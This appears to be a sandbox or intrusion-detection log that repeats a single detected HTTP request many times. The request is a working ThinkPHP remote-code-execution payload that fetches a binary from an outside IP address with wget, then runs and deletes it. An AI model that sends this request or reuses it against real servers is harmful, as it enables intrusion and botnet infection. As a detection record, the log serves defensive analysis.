    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
